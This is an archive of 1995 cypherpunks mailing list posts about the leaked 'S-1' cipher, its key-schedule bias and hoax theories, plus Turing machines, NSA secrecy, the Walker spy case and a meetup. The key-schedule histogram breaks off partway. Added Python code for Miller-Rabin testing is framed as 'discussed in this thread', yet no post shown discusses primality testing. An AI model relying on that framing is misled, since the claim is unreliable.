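The probabilistic test discussed in this thread, as an added example (not code from the thread or from GMP): one Miller-Rabin round, a SURETY-round test built on it, and a count of the bases that fail to expose a composite. That mpz_probab_prime_p runs Miller-Rabin rounds is an assumption here, and every function name below is illustrative.

```python
import random
from fractions import Fraction


def _decompose(n):
    """Write n - 1 as d * 2**s with d odd."""
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    return d, s


def is_witness(a, n):
    """True if base a proves that odd n > 2 is composite."""
    d, s = _decompose(n)
    x = pow(a, d, n)
    if x == 1 or x == n - 1:
        return False
    for _ in range(s - 1):
        x = pow(x, 2, n)
        if x == n - 1:
            return False
    return True


def strong_liars(n):
    """Bases in [1, n-1] that fail to expose the odd composite n."""
    return [a for a in range(1, n) if not is_witness(a, n)]


def is_probable_prime(n, surety=25, rng=None):
    """Miller-Rabin with `surety` random bases; False means proven composite."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13):
        if n % p == 0:
            return n == p
    rng = rng or random.SystemRandom()
    return not any(is_witness(rng.randrange(2, n - 1), n) for _ in range(surety))


def _is_composite(n):
    """Trial division; only used for the small n scanned below."""
    return any(n % f == 0 for f in range(2, int(n ** 0.5) + 1))


def worst_liar_fraction(limit):
    """Largest liars/(n-1) over odd composites n < limit, with that n."""
    best = (Fraction(0), None)
    for n in range(9, limit, 2):
        if _is_composite(n):
            frac = Fraction(len(strong_liars(n)), n - 1)
            if frac > best[0]:
                best = (frac, n)
    return best


if __name__ == "__main__":
    print("strong liars for 9:", strong_liars(9))
    print("worst liar fraction below 1000:", worst_liar_fraction(1000))
    print("2**127 - 1 probable prime:", is_probable_prime(2 ** 127 - 1))
```

No odd composite has more than 1/4 of its bases as liars, so SURETY independent rounds wrongly accept a composite with probability at most 4^-SURETY. A False result is a proof of compositeness; a True result is never a proof of primality.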





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 9 Aug 95 22:12:59 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: There's a hole in your crypto...
In-Reply-To: <9508070918.AA19988@cs.umass.edu>
Message-ID: <Pine.3.89.9508100049.D21852-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 7 Aug 1995, Futplex wrote:

> No crypto/privacy relevance, delete or flame now....
> 
> Nathan writes:
> > This is why the "not a Turing machine" assertion that the "Professor" is 
> > important.  We know that Turing machine is undecidable, so if we want to 
> > limit behavior, we can't have one.  BUT---we don't know that being a 
> > Turing machine is equivalent to having "unpredictable" behavior.  
> > Furthermore, a "proof" of the "not a Turing machine" assertion is going 
> > to have to be done by--you guessed it--a computer.  And this computer is 
> > running a program which definitely IS a Turing machine, if it is capable 
> > of "proving" that other (suitably non-trivial) programs are not Turing 
> > machines.
> 
> I think this is a bit misguided. The Turing machine (TM) is an extremely general
> abstract model of computation. The gargantuan hunk of code that runs the 
> Space Shuttle can be viewed as a Turing machine, as can a "Hello world" program
> written in Visual BASIC. So, there's not really a question about whether or
> not we're talking about Turing machines (unless perhaps you want to discuss
> quantum theorem provers and QTMs :) 

If a statement is vacuous, it needs refining :-).  If I were to state 
that "Program X is not a Turing Machine", I would be stating that program 
X does not model all Turing machines through its input.  It is the ability 
of some Turing machines to model all Turing machines through their input 
that makes them undecidable.


> Now, Rice's Theorem says that all non-trivial properties of TMs are undecidable.
> If I pick a "non-trivial" property, I can't conceivably build a TM ("write a
> program", if you like) that, upon input of the specification of an arbitrary TM,
> can tell whether or not that TM exhibits the property I picked. This does not
> mean that I can't decide whether some particular TMs have that property or not --
> I can. I just can't write down a procedure that handles the general case.

The problem here is that it is the interesting cases with which we are 
concerned.  If someone wants to write a computer program to "verify" my 
proof of the RSA algorithm, fine.  But I have to be convinced that their 
program does what they claim before I care.  And since their program 
takes mathematical theorems as input, it is already demonstrating 
near-Turing ( :-P) behavior.


> Also, this theorem clearly hinges on the meaning of "trivial". From what I've
> seen, a very strict interpretation is largely appropriate; nearly everything
> except the least exciting of trivial low-level properties of TMs seems to come
> out to be "non-trivial" in this regard. The proof of the theorem is more
> precise about this, naturally, but I've found this useful as a working
> colloquial definition.

I'll buy that.

> -Futplex    

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Wed, 9 Aug 95 21:48:01 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: "S1" encryption system
In-Reply-To: <199508092310.QAA11567@jobe.shell.portal.com>
Message-ID: <199508100443.EAA00611@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

BTW, I compiled it and confirmed that decryption is the inverse of
encryption for at least one (key, plaintext) pair..

> BTW I just was starting to look at the key scheduling and I noticed that
> fullkey is indexed in its 2nd slot by i*2 where i goes from 0 to 31, but
> is only declared as being 32 in size in that slot.  So I think this is
> another typo, probably the index should be i.  This kind of thing does
> not inspire confidence...

It looks very much like the sort of typo you would get from a
mistranslation from assembly language if the target architecture had a
*4-bit* processor. (This is also consistent with the "<<4"'s which
show up in several places in the code).

The typo is consistent -- it shows up every time the key schedule is
referenced; it looks like a semi-mechanical translation was done..

					- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMCmOdbT+rHlVUGpxAQFdNQP+I5lvR0itV0l2ypGF7EGGKrYcTnSNa0Fn
UqD7IIQ/BqViSeoXFHWzWJ5KUj9+y9RuKmwnMGGrlxRunZSDUya4VX0PZOX0bP4K
rbtu2j2H33cIrDPA+POvVYNAXBj3Sw1paIVf/07937oDZfdsqrn8c4rgXEeMgk4U
aoH4lpMfxY8=
=dd0O
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 9 Aug 95 21:52:02 PDT
To: cypherpunks@toad.com
Subject: Hail South Florida Cypherpunks!!
Message-ID: <199508100449.AAA17358@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

[All the rest of ye can delete this message now, with my sincere apologies,
and return to the regularly scheduled flamewar. <Regarding just how hard it
is to actually hit the "delete" key when a message ye don't want appears,
as opposed to posting yet *another* message.>]

HEAR YE, HEAR YE,  the inaugural meeting of South Florida's Brew Crew O'
(Cypherpunks), is scheduled for Saturday, August 12 at Ye Olde Riverwalk
Brewery in Ft. Lauderdale.

Good ale, good discussion and good friends will hopefully be a highlight of
the fest.  And should the invited Dark Knights (cops) arrive [we're
expecting one] a lively jousting contest will ensue (the loser will be
ceremoniously placed in the C-punk stockade and force fed Clipper Chips).
Should Sen. Exon, the evil Sheriff of Congressham (or was that
Congresspork?) attend our noble round table, we will have a hanging in the
town square, preceded, of course by the traditional legume toss. [Beano,
anyone?]

There will be a short speech by my friend Ginger <Phiberflea@aol.com> who is
fresh back from Las Vegas-shire and the DefCon III convention.  She will
describe what it's like to be one of the few wenches at a conference full of
male hackers [guys, it looks like we're all in for some trouble!]...

If one of ye brings a PGP-infested notebook, there may even be a keysigning!
We can even discuss the recent "spooky" posting to the list.

Anyway, _everyone_ is invited!  Peasants, squires, lords and ladies, jesters,
knights, and royalty, a chair and ale await ye all. Feel free to invite any
south-Floridians not on the list. No need to RSVP, (ye olde e-mail box is
full-to-overflowing already), just show up around 5:00 and have fun!

The Riverwalk Brewery isn't exactly Sir May's house, but here are the stats:

Riverwalk Brewery
111 SW 2nd Avenue
Ft. Lauderdale, FL 33301
(305) 764-8448

From Miamishire:   I-95 North to Broward Blvd., Take Broward East (right) 2
miles to Moffat (just before RR tracks), Turn Right, second building on the
right.

From Palm Beachshire:  I-95 South to Broward Blvd., Take Broward East (left)
2 miles to Moffat (just before RR tracks), Turn Right, second building on the
right.

Specialty Beers: - Marlin's Light, Blackbeard's Gold, and Riverwalk Red.

Dark Specials: - Offered on rotation: Panther's Porter, Swampwater Stout,
Black Marlin Oatmeal Stout, Ramsey's Imperial Stout.

Brewmaster's Special - changes monthly

Pints $3.00   /   10oz Mugs  $2.50
Happy Hour 4-7pm  Pints $2.50

Appetizers
Chicken Fingers, Wings, Spinach Dip, Calamari, [Mmmm...tentacles! :) ]
Italian Baked Ziti, Fried Mozzarella, Potato Skins. ($4.50-$5.95)

Soups & Salads 
Onion Soup, "Geek"/Caesar/Chef Salad, Souvlaki, Chicken Kebab ($3.50-$7.50)

Dinner (Sorry, Dragon meat is unavailable.)
New York Strip Steak, Grilled Twin Pork Chops, Shish Kebab,
Chicken Marsala, "Shaslik of Steer" ??? (whatever *that* is),
Grilled Sirloin Beef Tips, Grilled/Kebab Swordfish,
Grilled Mahi-Mahi [dolphin], Cajun Chicken Fettucini ($10.95-15.95)

Sandwiches & Burgers
Burger/Cheeseburger, Chicken/Mahi Mahi [dolphin] Sandwiches ($5.95-$6.95)

Dinners served 'till 11:00pm, Sandwiches served 'till 11:30pm,
Bar closes at 1:00am., party will [probably] end before that.

Ready your mounts and make haste!  Ging and I will arrive ~5:00pm to partake
of happy hour and fight back any invading hordes for a table. One of us 
(Ginger) may even be wearing a "munition," so watch out. I will wear my red
"Hillary" headband.

Hope to see you there!  :)
Ging. & Jim.
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCmKv21lp8bpvW01AQH0BAQAgZNgdkA/6zdMeHXdD1djYN2/yuw8th53
cftYhVxvdA65qMSAlgZPR2NN+2RC16LhAvLS3E3g2OuSRIpbI/V1OcvpcMG1/JvB
HTs1mxhsQrF8YwrUMhe4gOxftXryeR7lalmMBhfka2kpmeZNN2Cev52WQgr8ahWQ
NZ20pnfDhLY=
=dAdE
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCmPtioZzwIn1bdtAQFmTQF/SHKgZ/eKjEvBY4HBkDPKIMqpbiCP1agy
aFuGk5ly6YePLPHo2bEn0KWIvrqSrd9j
=f+JI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 9 Aug 95 21:54:06 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: NSA, NRO, and Keeping Secrets
In-Reply-To: <ac4682bd00021004c387@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950810004737.2605C-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Timothy C. May wrote:

> Date: Thu, 3 Aug 1995 13:49:35 -0700
> From: Timothy C. May <tcmay@sensemedia.net>
> To: Childers James <ic58@jove.acs.unt.edu>, Jim Ray <liberty@gate.net>
> Cc: cypherpunks@toad.com
> Subject: NSA, NRO, and Keeping Secrets
> 
> At 7:50 PM 8/3/95, Childers James wrote:
> 
> >I'm afraid I don't follow. Are you saying that the NSA is assuming a more
> >public role because (apparently) strong crypto is now widely available to
> >the public? I don't see the connection between A and B if this is what
> >you are claiming.
> >
> >Unless they're gearing up for a PR campaign... I wonder how the NSA has
> >been portrayed in Hollywood in the past. I've just seen them mentioned in
> >one movie I can think about ("Crimson Tide"). Anyone else know of references?
> 
> The NSA has been mentioned in many recent movies, even in television shows
> (like "The X Files"). I haven't been keeping a list, but the last Clancy
> movie, "A Clear and Present Danger," had references. And in more than one
> movie the reference to "NSA agents" doing various things is made.
> 
> The NSA has a high profile today. "No Such Agency" is clearly marked as an
> exit on the Baltimore-Washington highway, and of course even has a museum
> open to the public.
> 
> Even the National Reconnaissance Organization is public knowledge, partly
> because of the Burrows book "Deep Black," and partly because of the
> controversy over the huge building out near Dulles Airport.
> 
> Some things are mostly secret, though. The cover of Consular Operations was
> almost blown some years back by former agent Ludlum, but ConsOps has faded
> back into obscurity.

Then there are the e-systems like companies, operating in the U.S., often 
conducting operations under the guise of corporations yet ducking below 
the umbrella of "classified information" at the first sign of a suit.  
Yet, the employees walk about armed and turn up with bugging equipment in 
drug trafficker's neighborhoods.  e-systems is just the latest to be 
under public scrutiny.

Is it any wonder the government has begun to lean heavily on corporations 
where traditional institutional secrecy has been circumvented by FOIA and 
such?

Hell, e-systems is publicly traded, dekalg has been talking about 
initial public offerings for months.

There is perhaps more protection in the corporation of former 
intelligence types than in any agency.

I commented before that NRO and NSA were public relations savvy now because 
most of the deeply hidden projects had found their way elsewhere.


> 
> --Tim May
> 
> ..........................................................................
> Timothy C. May         | Crypto Anarchy: encryption, digital money,
> tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
> 408-728-0152           | knowledge, reputations, information markets,
> Corralitos, CA         | black markets, collapse of governments.
> Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Wed, 9 Aug 95 23:19:09 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <199508100000.UAA07792@crypto.com>
Message-ID: <Pine.SUN.3.91.950810012027.18054B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Aug 1995, Matt Blaze wrote:

> I don't know what to believe.  If this is a real, classified cryptosystem,
> it would be a very unusual first.  On the other hand, if this is a hoax,
> whoever did it appears to have gone to some trouble, and has included some
> interesting design features.  A third possibility, if we are to believe
> the spook markings, is that it is a re-implementation of someone else's
> cryptosystem, created for the purpose of cryptanalysis.

Two other possibilities: (1) It's merely an independently produced 
cryptosystem disguised as a "leak" to save its creator the trouble of 
asking experts to analyze it for him/her.  (2) It's a misleading / 
intentionally "wrong" version of something, "leaked" by a government 
official of whatever ilk to precipitate a legal investigation of 
Cypherpunks, remailers, etc.  (ie to show a judge to get wiretaps, etc.)

I'm skeptical of (2), but it occurred to me, and one can't be too safe...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 9 Aug 95 23:20:26 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Sat phone permit "wire"taps
In-Reply-To: <199508010141.AA02724@tyrell.net>
Message-ID: <Pine.SUN.3.91.950810012606.4442A-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Phil Fraering wrote:

> Date: Mon, 31 Jul 1995 20:41:37 -0500
> From: Phil Fraering <pgf@tyrell.net>
> To: stewarts@ix.netcom.com
> Cc: hoz@univel.telescan.com, cypherpunks@toad.com
> Subject: Sat phone permit "wire"taps
> 
> Bill, I also understood that the Walkers also leaked to the Soviets
> details on U.S. submarine sonar operating procedures.
> 
> _Anyway_, my point was, if they can't keep _that_ secret, I doubt
> they'd be able to keep secret the details/keys for activating the
> backdoor on whatever artificially weakened system they're forced to
> use (if they are).
> 
> Phil
> 

What the Walkers really gave over was the ability to decode U.S. Naval 
and some diplomatic ciphers through the surrender of codebooks, 
procedures, keycards and repair manuals for the crypto hardware.  The 
resulting traffic and crypto analysis was backbreaking- and valuable 
enough to make Walker Sr. the best paid spy to that date in the Soviet 
scheme of things.

Sov's discovered their traffic was being read on the Ivy line by 
listening to naval and diplomatic communication referencing it directly- 
and a little bit of selective transmission to confirm the source of 
intelligence.  (The U.S. played a similar trick on the Japanese to verify 
Midway as their target in the Pacific- they were reading Purple and the 
JN-12 and JN series flawlessly at the time)

Sov's discovered their subs were being tracked with amazing ease by 
listening to U.S. Naval anti-sub communications and reports.  The 
result:  Directed attention to the noise emissions of their sub fleet, 
something they might have overlooked for years otherwise.

The grand result:  Among others: Stronger Soviet Encryption, and the 
purchase from Japan of high precision milling equipment which allowed the
Sov's to produce perfected and hyper quiet propellers for their subs- they
jumped 10 years in technology in 12 months.

The most damaging and most coveted espionage information is cryptanalysis.

Period.

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Thu, 10 Aug 95 00:38:13 PDT
To: cypherpunks@toad.com
Subject: PGPFOne article in MacWeek URL
Message-ID: <v02120d01ac4f75aa40ff@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


MacWeek News

Aug 7, Vol 9 No 31

"PGPFone locks down phone conversations," by Robert Hess

<http://www.zdnet.com/~macweek/mw_08-07-95/news3.html>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Thu, 10 Aug 95 02:03:29 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: "S-1" key schedule
In-Reply-To: <199508100853.EAA13204@crypto.com>
Message-ID: <Pine.SOL.3.91.950810035659.17530A-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Matt Blaze wrote:

> My money still says the "TOP SECRET" markings and other clues that
> suggest that "S-1" has something to do with Skipjack are a hoax.

Has anyone checked to see if this is just an older but obscure published 
algorithm? If it uses an 80-bit key, that tells me it's not too old, but 
I'm new to this stuff.

If it is a new algorithm, is it just a variant, or something completely 
new? 

[Sorry in advance if this is noise...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 10 Aug 95 01:45:34 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <Pine.SUN.3.91.950810012027.18054B-100000@rwd.goucher.edu>
Message-ID: <199508100845.EAA18756@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jon writes:
> Two other possibilities: (1) It's merely an independently produced 
> cryptosystem disguised as a "leak" to save its creator the trouble of 
> asking experts to analyze it for him/her.  

It strikes me as rather foolish to mail off anonymous copies to several
individual recipients (Matt, Perry, Tim, ...) in addition to the list, if
S1 is a real leak. Why aid the traffic analysts by firing off multiple
messages through the remailers ?

BTW, the code has been posted to Usenet by a Frank Falstaff -- look for
message ID <40b8tk$cj4@news.xs4all.nl> in sci.crypt (Wed, Aug. 9, 1995).
His article refers to a message ID (namely <40b50l$oa8@utopia.hacktic.nl>)
that differs from the message ID of the copy sent to c'punks. So it looks
like there was at least one additional recipient. That's a minimum of 5
originals so far....

-Futplex



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 10 Aug 95 01:45:04 PDT
To: cypherpunks@toad.com
Subject: "S-1" key schedule
Message-ID: <199508100853.EAA13204@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I have to admit I've been staying up late playing with the "S-1"
cipher that was posted here earlier.  Hal Finney already noted what is
clearly a bug in the code; only half the key schedule is ever used,
and only in the first 16 of the 32 rounds.  Even assuming that that
is a typo rather than intentional, "S-1" still appears to suffer from
key-related weaknesses.

The key expansion function in "S-1" produces a skewed key schedule
given uniformly distributed 80 bit input keys.  Here's a histogram
of the distribution of key schedule bytes produced by all 2^32 ways
of generating each byte (each key schedule byte is a function of the
F functions applied to four selected input keys bytes).  The expected
value for each line is 16777216.  For just about any conventional block
cipher, (e.g., DES) we'd expect this graph to be absolutely flat.  Yet
here some values are more than 5% away from expected.  This behavior
appears to be a consequence of the non-uniform distribution of "S-1"'s
F output values, which are used to create the expanded key.

This does not bode well for "S-1"; it means that some key bytes are
applied against the ciphertext slightly more often than others, even when
the input key itself is uniformly chosen.  (Ditto for the outputs of the F
functions themselves, even when their inputs are uniformly distributed,
but that's still another story).

Still, this may not be fatal; the key schedule is still much larger than
the keyspace, so there might not be any easy way for the cryptanalyst to
exploit this property to any great advantage.  It is possible that the
cipher's structure somehow cancels this out in some non-obvious way
that manages to provide a flat 2^80 keyspace, but it's hard to see
exactly how.

My money still says the "TOP SECRET" markings and other clues that
suggest that "S-1" has something to do with Skipjack are a hoax.

-matt
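
A check on the histogram that follows, added here and not part of the original post: the counts for byte values 00 through 3f, copied from that listing, factor exactly into a high-nibble count times a low-nibble count. The figure of 2^16 inputs per nibble is an inference from those counts rather than something the post states, and the function names are illustrative.

```python
PAIRS_PER_NIBBLE = 1 << 16   # inferred: each nibble is set by two key bytes
FLAT_BYTE_COUNT = 1 << 24    # the post's expected value for each histogram line
FLAT_NIBBLE_COUNT = PAIRS_PER_NIBBLE // 16

# Counts for byte values 00..3f, copied from the histogram in the post.
# One row per high nibble (0..3), sixteen low-nibble columns per row.
POSTED = (
    (16396100, 16153930, 15820450, 16197600, 16142020, 15907790, 16300820, 16471530,
     16439770, 16165840, 16126140, 16693850, 16503290, 16221420, 15931610, 16705760),
    (16933000, 16682900, 16338500, 16728000, 16670600, 16428700, 16834600, 17010900,
     16978100, 16695200, 16654200, 17240500, 17043700, 16752600, 16453300, 17252800),
    (16916480, 16666624, 16322560, 16711680, 16654336, 16412672, 16818176, 16994304,
     16961536, 16678912, 16637952, 17223680, 17027072, 16736256, 16437248, 17235968),
    (16416750, 16174275, 15840375, 16218000, 16162350, 15927825, 16321350, 16492275,
     16460475, 16186200, 16146450, 16714875, 16524075, 16241850, 15951675, 16726800),
)


def factor_histogram(rows):
    """Split counts[hi][lo] into hi_count[hi] * lo_count[lo].

    Succeeds only if the table is an exact outer product whose low-nibble
    factor sums to 2^16; otherwise raises ValueError.
    """
    hi_counts = []
    for row in rows:
        total = sum(row)
        if total % PAIRS_PER_NIBBLE:
            raise ValueError("row total is not a multiple of 2^16")
        hi_counts.append(total // PAIRS_PER_NIBBLE)

    lo_counts = []
    for cell in rows[0]:
        if cell % hi_counts[0]:
            raise ValueError("first row does not divide by its nibble count")
        lo_counts.append(cell // hi_counts[0])

    # Every listed cell must equal the product of its two nibble counts.
    for hi, row in zip(hi_counts, rows):
        for lo, cell in zip(lo_counts, row):
            if hi * lo != cell:
                raise ValueError("table is not an outer product")
    return hi_counts, lo_counts


def ratio_range(counts, flat):
    """Smallest and largest count relative to a flat distribution."""
    return min(counts) / flat, max(counts) / flat


if __name__ == "__main__":
    hi, lo = factor_histogram(POSTED)
    print("high-nibble counts (values 0..3):", hi)
    print("low-nibble counts  (values 0..f):", lo)
    print("low-nibble ratio range:", ratio_range(lo, FLAT_NIBBLE_COUNT))
    print("byte 02 ratio:", hi[0] * lo[2] / FLAT_BYTE_COUNT)
```

For these rows each nibble stays within about 3% of flat; the byte values listed at more than 5% from expected are products of two such nibble deviations.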


key   number
val  produced #/exptd
--   -------- -------
00 = 16396100 (0.977) ***************************************************
01 = 16153930 (0.963) **************************************************
02 = 15820450 (0.943) *************************************************
03 = 16197600 (0.965) **************************************************
04 = 16142020 (0.962) **************************************************
05 = 15907790 (0.948) *************************************************
06 = 16300820 (0.972) **************************************************
07 = 16471530 (0.982) ***************************************************
08 = 16439770 (0.980) ***************************************************
09 = 16165840 (0.964) **************************************************
0a = 16126140 (0.961) **************************************************
0b = 16693850 (0.995) ****************************************************
0c = 16503290 (0.984) ***************************************************
0d = 16221420 (0.967) **************************************************
0e = 15931610 (0.950) *************************************************
0f = 16705760 (0.996) ****************************************************
10 = 16933000 (1.009) ****************************************************
11 = 16682900 (0.994) ****************************************************
12 = 16338500 (0.974) ***************************************************
13 = 16728000 (0.997) ****************************************************
14 = 16670600 (0.994) ****************************************************
15 = 16428700 (0.979) ***************************************************
16 = 16834600 (1.003) ****************************************************
17 = 17010900 (1.014) *****************************************************
18 = 16978100 (1.012) *****************************************************
19 = 16695200 (0.995) ****************************************************
1a = 16654200 (0.993) ****************************************************
1b = 17240500 (1.028) *****************************************************
1c = 17043700 (1.016) *****************************************************
1d = 16752600 (0.999) ****************************************************
1e = 16453300 (0.981) ***************************************************
1f = 17252800 (1.028) *****************************************************
20 = 16916480 (1.008) ****************************************************
21 = 16666624 (0.993) ****************************************************
22 = 16322560 (0.973) ***************************************************
23 = 16711680 (0.996) ****************************************************
24 = 16654336 (0.993) ****************************************************
25 = 16412672 (0.978) ***************************************************
26 = 16818176 (1.002) ****************************************************
27 = 16994304 (1.013) *****************************************************
28 = 16961536 (1.011) *****************************************************
29 = 16678912 (0.994) ****************************************************
2a = 16637952 (0.992) ***************************************************
2b = 17223680 (1.027) *****************************************************
2c = 17027072 (1.015) *****************************************************
2d = 16736256 (0.998) ****************************************************
2e = 16437248 (0.980) ***************************************************
2f = 17235968 (1.027) *****************************************************
30 = 16416750 (0.979) ***************************************************
31 = 16174275 (0.964) **************************************************
32 = 15840375 (0.944) *************************************************
33 = 16218000 (0.967) **************************************************
34 = 16162350 (0.963) **************************************************
35 = 15927825 (0.949) *************************************************
36 = 16321350 (0.973) ***************************************************
37 = 16492275 (0.983) ***************************************************
38 = 16460475 (0.981) ***************************************************
39 = 16186200 (0.965) **************************************************
3a = 16146450 (0.962) **************************************************
3b = 16714875 (0.996) ****************************************************
3c = 16524075 (0.985) ***************************************************
3d = 16241850 (0.968) **************************************************
3e = 15951675 (0.951) *************************************************
3f = 16726800 (0.997) ****************************************************
40 = 16908220 (1.008) ****************************************************
41 = 16658486 (0.993) ****************************************************
42 = 16314590 (0.972) **************************************************
43 = 16703520 (0.996) ****************************************************
44 = 16646204 (0.992) ****************************************************
45 = 16404658 (0.978) ***************************************************
46 = 16809964 (1.002) ****************************************************
47 = 16986006 (1.012) *****************************************************
48 = 16953254 (1.010) ****************************************************
49 = 16670768 (0.994) ****************************************************
4a = 16629828 (0.991) ***************************************************
4b = 17215270 (1.026) *****************************************************
4c = 17018758 (1.014) *****************************************************
4d = 16728084 (0.997) ****************************************************
4e = 16429222 (0.979) ***************************************************
4f = 17227552 (1.027) *****************************************************
50 = 17003210 (1.013) *****************************************************
51 = 16752073 (0.999) ****************************************************
52 = 16406245 (0.978) ***************************************************
53 = 16797360 (1.001) ****************************************************
54 = 16739722 (0.998) ****************************************************
55 = 16496819 (0.983) ***************************************************
56 = 16904402 (1.008) ****************************************************
57 = 17081433 (1.018) *****************************************************
58 = 17048497 (1.016) *****************************************************
59 = 16764424 (0.999) ****************************************************
5a = 16723254 (0.997) ****************************************************
5b = 17311985 (1.032) ******************************************************
5c = 17114369 (1.020) *****************************************************
5d = 16822062 (1.003) ****************************************************
5e = 16521521 (0.985) ***************************************************
5f = 17324336 (1.033) ******************************************************
60 = 17147760 (1.022) *****************************************************
61 = 16894488 (1.007) ****************************************************
62 = 16545720 (0.986) ***************************************************
63 = 16940160 (1.010) ****************************************************
64 = 16882032 (1.006) ****************************************************
65 = 16637064 (0.992) ***************************************************
66 = 17048112 (1.016) *****************************************************
67 = 17226648 (1.027) *****************************************************
68 = 17193432 (1.025) *****************************************************
69 = 16906944 (1.008) ****************************************************
6a = 16865424 (1.005) ****************************************************
6b = 17459160 (1.041) ******************************************************
6c = 17259864 (1.029) *****************************************************
6d = 16965072 (1.011) *****************************************************
6e = 16661976 (0.993) ****************************************************
6f = 17471616 (1.041) ******************************************************
70 = 16792580 (1.001) ****************************************************
71 = 16544554 (0.986) ***************************************************
72 = 16203010 (0.966) **************************************************
73 = 16589280 (0.989) ***************************************************
74 = 16532356 (0.985) ***************************************************
75 = 16292462 (0.971) **************************************************
76 = 16694996 (0.995) ****************************************************
77 = 16869834 (1.006) ****************************************************
78 = 16837306 (1.004) ****************************************************
79 = 16556752 (0.987) ***************************************************
7a = 16516092 (0.984) ***************************************************
7b = 17097530 (1.019) *****************************************************
7c = 16902362 (1.007) ****************************************************
7d = 16613676 (0.990) ***************************************************
7e = 16316858 (0.973) **************************************************
7f = 17109728 (1.020) *****************************************************
80 = 16920610 (1.009) ****************************************************
81 = 16670693 (0.994) ****************************************************
82 = 16326545 (0.973) ***************************************************
83 = 16715760 (0.996) ****************************************************
84 = 16658402 (0.993) ****************************************************
85 = 16416679 (0.979) ***************************************************
86 = 16822282 (1.003) ****************************************************
87 = 16998453 (1.013) *****************************************************
88 = 16965677 (1.011) *****************************************************
89 = 16682984 (0.994) ****************************************************
8a = 16642014 (0.992) ****************************************************
8b = 17227885 (1.027) *****************************************************
8c = 17031229 (1.015) *****************************************************
8d = 16740342 (0.998) ****************************************************
8e = 16441261 (0.980) ***************************************************
8f = 17240176 (1.028) *****************************************************
90 = 17416210 (1.038) ******************************************************
91 = 17158973 (1.023) *****************************************************
92 = 16804745 (1.002) ****************************************************
93 = 17205360 (1.026) *****************************************************
94 = 17146322 (1.022) *****************************************************
95 = 16897519 (1.007) ****************************************************
